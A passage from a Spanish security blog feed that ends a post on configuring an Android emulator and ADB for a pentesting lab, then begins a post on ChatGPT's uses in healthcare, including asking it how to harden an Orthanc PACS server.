<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="488" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-24-740x488.png" alt="" class="wp-image-31170" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-24-740x488.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-24-300x198.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-24-768x506.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-24.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Podremos ver como los todos los modelos de móvil presentan una columna llamada “Play Store” donde aparecerá o no, el logo de esta aplicación en dependencia de si lo trae instalado o no. Esta característica nos facilitará la instalación de aplicaciones que estén en esta plataforma.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="489" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-25-740x489.png" alt="" class="wp-image-31171" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-25-740x489.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-25-300x198.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-25-768x507.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-25.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>En la captura siguiente veremos que nuestra elección será un modelo Pixel 4 con la aplicación de Play Store instalada y le daremos a “<em>Next</em>”.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="489" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-26-740x489.png" alt="" class="wp-image-31172" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-26-740x489.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-26-300x198.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-26-768x507.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-26.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>En la siguiente vista seleccionaremos la versión de Android que queramos instalar. En la parte superior veremos tres pestañas que nos indican las imágenes recomendadas, las que son x86 y otras imágenes.</p>



<p>Seleccionaremos la imagen de la versión de Android que queremos instalar y la descargaremos pulsando en la flecha que aparece a la derecha del nombre de la versión. En este caso, hemos elegido Android 8.0 (Google APIS) que además tiene instalado el servicio de Google Play y con una arquitectura x86_64 y le daremos a “<em>Next</em>”.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="491" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-27-740x491.png" alt="" class="wp-image-31173" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-27-740x491.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-27-300x199.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-27-768x510.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-27.png 851w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Aceptaremos el acuerdo de licencia y pulsaremos en “<em>Next</em>”.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="543" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-34-740x543.png" alt="" class="wp-image-31180" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-34-740x543.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-34-300x220.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-34-768x563.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-34.png 866w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Cuando termine de instalar todos los componentes seleccionados pulsaremos en “<em>Finish</em>”.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="540" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-35-740x540.png" alt="" class="wp-image-31181" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-35-740x540.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-35-300x219.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-35-768x561.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-35.png 886w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Posteriormente nos mostrará una ventana con el resumen de las características del dispositivo que hemos configurado y aquí, en “<em>AVD Name</em>”, podremos cambiar el nombre del terminal emulado y le daremos a “<em>Finish</em>”.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="490" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-36-740x490.png" alt="" class="wp-image-31182" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-36-740x490.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-36-300x199.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-36-768x509.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-36.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Una vez cargado el dispositivo nos mostrará una ventana donde podremos arrancarlo, ver dónde está guardado, editar la configuración y ver la configuración del terminal. En la imagen resaltamos el botón de arranque.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="201" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-37-740x201.png" alt="" class="wp-image-31183" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-37-740x201.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-37-300x82.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-37-768x209.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-37.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Y veremos cómo se nos abre una ventana nueva con el terminal con el móvil en funcionamiento.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="467" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-38-740x467.png" alt="" class="wp-image-31184" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-38-740x467.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-38-300x189.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-38-768x485.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-38.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<h2 class="wp-block-heading">Instalación y ejecución de Android Debug Bridge (ADB)</h2>



<p><em>Android Debug Bridge</em> es una herramienta de línea de comandos que nos permite comunicarnos con el dispositivo móvil y ejecutar múltiples instrucciones para realizar distintas acciones como puede ser acceder al interior del dispositivo, copiar o eliminar información, instalar o desinstalar aplicaciones, etc.</p>



<p>Al descargar Android Studio, generalmente se incluye dentro de la carpeta “<em>SDK Tools</em>” que mencionamos anteriormente bajo el nombre de “<em>platform-tools”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="916" height="336" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-39.png" alt="" class="wp-image-31185" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-39.png 916w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-39-300x110.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-39-740x271.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-39-768x282.png 768w" sizes="(max-width: 916px) 100vw, 916px" /></figure></div>


<p>En cualquier caso, si no la encontráis la podéis obtener en el siguiente enlace para su descarga:</p>



<p><a href="https://developer.android.com/studio/releases/platform-tools">https://developer.android.com/studio/releases/platform-tools</a></p>



<p>Una vez localizada o descargada, accederemos a dicha carpeta y abriremos un <em>cmd</em>.</p>



<p>La ruta suele ser: <em>C:\Users\USUARIO\AppData\Local\Android\Sdk\platform-tools</em></p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="916" height="246" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-40.png" alt="" class="wp-image-31186" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-40.png 916w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-40-300x81.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-40-740x199.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-40-768x206.png 768w" sizes="(max-width: 916px) 100vw, 916px" /></figure></div>


<p>Ejecutaremos <em>adb.exe</em> para ver las posibles opciones que tiene la herramienta.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="886" height="484" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-41.png" alt="" class="wp-image-31187" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-41.png 886w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-41-300x164.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-41-740x404.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-41-768x420.png 768w" sizes="(max-width: 886px) 100vw, 886px" /></figure></div>


<p>Desde la misma consola, podremos utilizar algunos de los siguientes comandos:</p>



<ul>
<li><strong>adb devices</strong>: Lista los emuladores que actualmente se encuentran conectados en el sistema.</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="111" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-42-740x111.png" alt="" class="wp-image-31188" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-42-740x111.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-42-300x45.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-42-768x115.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-42.png 800w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<ul>
<li><strong>adb root/unroot</strong>: Reinicia el cliente con permisos (root) o sin permisos de root (unroot). Es importante destacar que para la realización de la mayoría de las acciones es necesario que seamos root.</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="185" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-43-740x185.png" alt="" class="wp-image-31189" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-43-740x185.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-43-300x75.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-43.png 759w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<ul>
<li><strong>adb push/pull [path_to_file]</strong>: Este comando nos permite enviar un archivo desde el ordenador al dispositivo móvil (push) y del dispositivo móvil al ordenador (pull).</li>



<li><strong>adb install/uninstall [path_to_apk]</strong>: Para instalar (install) o desinstalar una aplicación (uninstall).</li>



<li><strong>adb shell</strong>: Permite acceder al dispositivo por consola (recordar que Android es un sistema Linux, por lo que los comandos serán los mismos que empleamos en nuestra Kali).</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="130" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-44-740x130.png" alt="" class="wp-image-31190" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-44-740x130.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-44-300x53.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-44-768x135.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-44.png 803w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<ul>
<li><strong>adb reboot</strong>: Fuerza un reinicio del dispositivo.</li>
</ul>



<h3 class="wp-block-heading">Instalación de Android Debug Bridge</h3>



<p>En caso de no tener <em>Android Debug Bridge</em> instalado, a continuación, mostramos los pasos a seguir para descargarlo. Podemos realizar la descarga desde el siguiente link: <a href="https://developer.android.com/studio/releases/platform-tools">https://developer.android.com/studio/releases/platform-tools</a></p>



<p>En nuestro caso, pulsaremos sobre “<em>Cómo descargar las herramientas de la plataforma SDK para Windows</em>” como se puede ver en la siguiente imagen.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="477" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-45-740x477.png" alt="" class="wp-image-31191" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-45-740x477.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-45-300x194.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-45-768x496.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-45.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Aceptaremos los términos y condiciones del contrato, pulsaremos sobre “<em>Descargar Android SDK Plataform-Tools para Windows</em>” y se descargará con zip con las herramientas.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="599" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-46-740x599.png" alt="" class="wp-image-31192" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-46-740x599.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-46-300x243.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-46-768x621.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-46.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Descomprimimos el <em>.zip</em> que se habrá guardado en nuestra carpeta de descargas o la que tengamos configurada para descargas.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="216" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-47-740x216.png" alt="" class="wp-image-31193" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-47-740x216.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-47-300x87.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-47-768x224.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-47.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Entramos en la carpeta “<em>platform-tools”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="187" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-48-740x187.png" alt="" class="wp-image-31194" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-48-740x187.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-48-300x76.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-48-768x195.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-48.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Vemos que está el ejecutable <em>“adb.exe”</em>, abrimos un cmd y ejecutamos <em>“adb.exe”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="276" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-49-740x276.png" alt="" class="wp-image-31195" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-49-740x276.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-49-300x112.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-49-768x287.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-49.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Llegados a este punto volveríamos al apartado anterior “Instalación y ejecución de Android Debug Bridge”.</p>



<p>Hasta aquí tendríamos montado nuestro entorno de pruebas con el emulador móvil funcionando.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="467" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-50-740x467.png" alt="" class="wp-image-31196" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-50-740x467.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-50-300x189.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-50-768x485.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-50.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<h2 class="wp-block-heading">Referencias</h2>



<ul>
<li><a href="https://www.genymotion.com/download/">https://www.genymotion.com/download/</a></li>



<li><a href="https://developer.android.com/studio/run/managing-avds?hl=es-419">https://developer.android.com/studio/run/managing-avds?hl=es-419</a></li>



<li><a href="https://developer.android.com/studio/command-line/adb?hl=es-419">https://developer.android.com/studio/command-line/adb?hl=es-419</a></li>



<li><a href="https://visualstudio.microsoft.com/es/vs/msft-android-emulator/">https://visualstudio.microsoft.com/es/vs/msft-android-emulator/</a></li>
</ul>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/10/02/pentesting-en-android-i-configuracion-del-entorno/">Pentesting en Android (I): Configuración del entorno</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/10/02/pentesting-en-android-i-configuracion-del-entorno/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aplicación de ChatGPT al ámbito de la salud</title>
		<link>https://www.securityartwork.es/2023/09/11/aplicacion-de-chatgpt-al-ambito-de-la-salud/</link>
					<comments>https://www.securityartwork.es/2023/09/11/aplicacion-de-chatgpt-al-ambito-de-la-salud/#respond</comments>
		
		<dc:creator><![CDATA[Marina Galiano]]></dc:creator>
		<pubDate>Mon, 11 Sep 2023 08:35:43 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31097</guid>

					<description><![CDATA[<p>La herramienta digital de ChatGPT es de sobra conocida a estas alturas. Esta inteligencia artificial (IA) está teniendo un gran impacto en la era de la información y la comunicación. ChatGPT se está utilizando con diferentes objetivos para mejorar algunos sistemas, sin embargo, algunas de las aplicaciones por la que se está usando están generando [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/09/11/aplicacion-de-chatgpt-al-ambito-de-la-salud/">Aplicación de ChatGPT al ámbito de la salud</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>La herramienta digital de ChatGPT es de sobra conocida a estas alturas. Esta inteligencia artificial (IA) está teniendo un gran impacto en la era de la información y la comunicación. ChatGPT se está utilizando con diferentes objetivos para mejorar algunos sistemas, sin embargo, algunas de las aplicaciones por la que se está usando están generando controversia, y por tanto, una razón más por la que se está haciendo eco de ella.</p>



<p>Si todavía no conoces ChatGPT, debes saber que es una herramienta desarrollada por OpenAI especializada en el diálogo. Es un chatbot. Es decir, tú introduces una entrada de texto y ChatGPT genera un texto coherente que responde a lo que le hayas escrito.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-18-740x179.png" alt="" class="wp-image-31098" width="740" height="179" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-18-740x179.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-18-300x73.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-18-768x186.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-18.png 864w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Pues bien, ChatGPT también se puede usar en salud. Pero, ¿a qué nos referimos con “en salud”? “En salud” significa que puede aplicarse en cualquier ámbito que afecte a la salud de las personas, ya sea para desarrollar un nuevo software que mejore la gestión sanitaria de un hospital como para preguntar dudas desde casa sobre nuestro bienestar.</p>



<p>Se han desarrollado varios proyectos utilizando IA enfocados en salud. Algunos de ellos implementan los mismos modelos de ChatGPT y otros se basan en tecnología propia, todos ellos teniendo en cuenta la comunicación con el paciente.</p>



<span id="more-31097"></span>



<h2 class="wp-block-heading">Triaje de pacientes con IA</h2>



<p>El triaje es un proceso que selecciona y clasifica a los pacientes según el tipo de urgencia, esto es esencial cuando la demanda y las necesidades clínicas superan a los recursos. Existen varios proyectos donde se utiliza la IA para realizar un triaje eficiente en los centros de salud y hospitales. </p>



<p>Uno de estos ejemplos es el Proyecto React del Hospital Universitario Virgen del Rocío, donde mediante un algoritmo avanzado de optimización y sistemas de información hospitalarios se tienen en cuenta factores como la frecuentación, la variabilidad, la distribución de horas y niveles de gravedad. De esta manera se ordenan los recursos, los turnos de trabajo y la gestión de la espera. </p>



<p>Otro ejemplo es la empresa Mediktor, nacida en Barcelona en 2011. La empresa ha desarrollado una herramienta de triaje y prediagnóstico mediante inteligencia artificial que se está implantando cada vez en más sistemas sanitarios como aseguradoras u hospitales entre otros.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-20.png" alt="" class="wp-image-31100" width="727" height="426" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-20.png 995w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-20-300x176.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-20-740x434.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-20-768x450.png 768w" sizes="(max-width: 727px) 100vw, 727px" /></figure></div>


<h2 class="wp-block-heading">Predicción de demencia y alzheimer con GPT-3</h2>



<p>Otro ejemplo de implementación de la ia en este ámbito es el estudio realizado por investigadores de la universidad de Drexel donde demostraron que el programa GPT-3 de OpenAI puede identificar pistas del habla espontánea con un 80% de precisión en la predicción de las primeras etapas de la demencia y del alzheimer. Este estudio demuestra que existe un gran potencial para desarrollar herramientas impulsadas por inteligencia artificial para el diagnóstico temprano de la demencia y proporcionar intervenciones personalizadas directas a las necesidades individuales.</p>



<h2 class="wp-block-heading">Generación de plan clínico</h2>



<p>El último proyecto presentado es Glass AI, una herramienta en desarrollo para la plataforma glass que utiliza IA para elaborar un diagnóstico o un plan clínico a partir de una entrada de texto sobre un problema clínico de un paciente. Esta herramienta no está destinada para el público general sino para médicos y personal sanitario capacitados para interpretar la salida ya que puede resultar incompleta, incorrecta o sesgada. Por tanto, sería una herramienta de soporte muy útil para el personal clínico cualificado.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-21.png" alt="" class="wp-image-31101" width="629" height="295" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-21.png 1010w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-21-300x141.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-21-740x347.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-21-768x360.png 768w" sizes="(max-width: 629px) 100vw, 629px" /></figure></div>


<h1 class="wp-block-heading">ChatGPT en nuestra vida</h1>



<p>La realidad es que ChatGPT ya forma parte de nuestras vidas casi como una herramienta imprescindible. Así que, ¿cómo nos puede ayudar actualmente para tomar decisiones sobre nuestra salud en nuestro día a día? Como ChatGPT utiliza el aprendizaje profundo para interactuar con los pacientes y brindarles información de salud personalizada, podemos realizarle preguntas sobre nuestro bienestar o incluso por síntomas que estemos sufriendo. </p>



<p>Esta tecnología tiene un gran potencial para mejorar la eficiencia y la calidad de la atención médica. Hemos hecho algunos ejemplos para mostrar cómo puede ChatGPT informarnos sobre qué hacer en determinadas situaciones. Las ventajas que tiene ChatGPT es la rapidez en sus respuestas y que no es necesario el desplazamiento hasta un centro sanitario para obtener una respuesta. Una gran ayuda para el sistema sanitario para descongestionar sus servicios y poder ofrecer una buena atención clínica.</p>



<p>En el primer caso, le contamos que nos hemos quemado la mano con la bandeja del horno y si es necesario que vayamos al hospital. Y una de las primeras cosas que nos dice ChatGPT es que evaluemos la quemadura, es decir si es leve o grave. Si es grave nos aconseja que busquemos atención médica lo antes posible. Sin embargo, si es leve, nos da varios consejos para reducir el dolor y curar correctamente la quemadura. Además, ChatGPT siempre remarca que la figura del personal sanitario es la que puede darte mejores consejos.</p>


<div class="wp-block-image is-style-default">
<figure class="aligncenter size-full is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-22.png" alt="" class="wp-image-31102" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-22.png 712w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-22-300x227.png 300w" sizes="(max-width: 712px) 100vw, 712px" /></figure></div>


<p>En este segundo caso, le comentamos que en los resultados de un análisis de sangre nos ha salido el colesterol alto y le preguntamos cómo podemos reducirlo. ChatGPT nos ofrece medidas generales para controlar el colesterol e información sobre la dieta y el ejercicio adecuados para mantener una buena salud, pero remarcando de nuevo la figura del médico.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-24.png" alt="" class="wp-image-31105" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-24.png 682w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-24-300x257.png 300w" sizes="(max-width: 682px) 100vw, 682px" /></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="681" height="319" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-25.png" alt="" class="wp-image-31104" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-25.png 681w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-25-300x141.png 300w" sizes="(max-width: 681px) 100vw, 681px" /></figure></div>


<p>Estos ejemplos demuestran cómo ChatGPT puede utilizarse para brindar información personalizada, precisa y detallada a los pacientes sobre temas de salud y enfermedad, lo que puede mejorar la comprensión del paciente y, en última instancia, mejorar la calidad y la eficiencia de la atención médica, evitando la saturación de los centros sanitarios.</p>



<h1 class="wp-block-heading">ChatGPT en ciberseguridad en salud</h1>



<p>Otra de las múltiples aplicaciones que puede tener ChatGPT es en ámbito de la ciberseguridad. En este artículo nos vamos a centrar en la ciberseguridad aplicada al sector sanitario. </p>



<p>Pongamos, por ejemplo, que una organización con un PACS (Picture Archiving and Communication System) no tiene implantada ninguna medida de seguridad, pero quiere comenzar a proteger su información. Como la empresa todavía no tiene conocimientos de ciberseguridad en este ámbito, se podría empezar preguntando a ChatGPT qué debería hacer para proteger un PACS. La respuesta generada por la herramienta nos proporciona recomendaciones generales acerca de cómo asegurarlo.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-26.png" alt="" class="wp-image-31106" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-26.png 723w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-26-265x300.png 265w" sizes="(max-width: 723px) 100vw, 723px" /></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-28.png" alt="" class="wp-image-31108" width="680" height="392"/></figure></div>


<p>En nuestro caso utilizamos Orthanc, una herramienta de código abierto. Como queremos medidas más específicas, le preguntamos concretando con nuestro software y cómo protegerlo.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-27-740x708.png" alt="" class="wp-image-31107" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-27-740x708.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-27-300x287.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-27.png 742w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>ChatGPT nos contesta de manera general de nuevo, pero buscamos líneas más concretas. Así que le preguntamos de nuevo.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-29.png" alt="" class="wp-image-31109" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-29.png 688w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-29-278x300.png 278w" sizes="(max-width: 688px) 100vw, 688px" /></figure></div>


<p>Una de las medidas que nos llaman la atención es la de <em>Limitar el acceso remoto</em>. Profundizamos en cómo realizar esto preguntando a ChatGPT el procedimiento para ello. Y nos responde cómo limitar el acceso de las diferentes modalidades (máquinas de diagnóstico de imagen médica).&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="741" height="763" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-30.png" alt="" class="wp-image-31110" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-30.png 741w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-30-291x300.png 291w" sizes="(max-width: 741px) 100vw, 741px" /></figure></div>


<p>Comprobamos que realmente esos son los pasos adecuados, poniéndolos en práctica en nuestro Orthanc. Para ello, seguimos las instrucciones proporcionadas por ChatGPT, abriendo primero el archivo de configuración “orthanc.json” y dirigiéndonos al apartado “<em>DicomModalities</em>”. Así que vamos a por ese archivo cuando nos damos cuenta del primer obstáculo. No sabemos dónde está localizado este archivo, así que le preguntamos a ChatGPT.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-31.png" alt="" class="wp-image-31111" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-31.png 589w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-31-300x192.png 300w" sizes="(max-width: 589px) 100vw, 589px" /></figure></div>


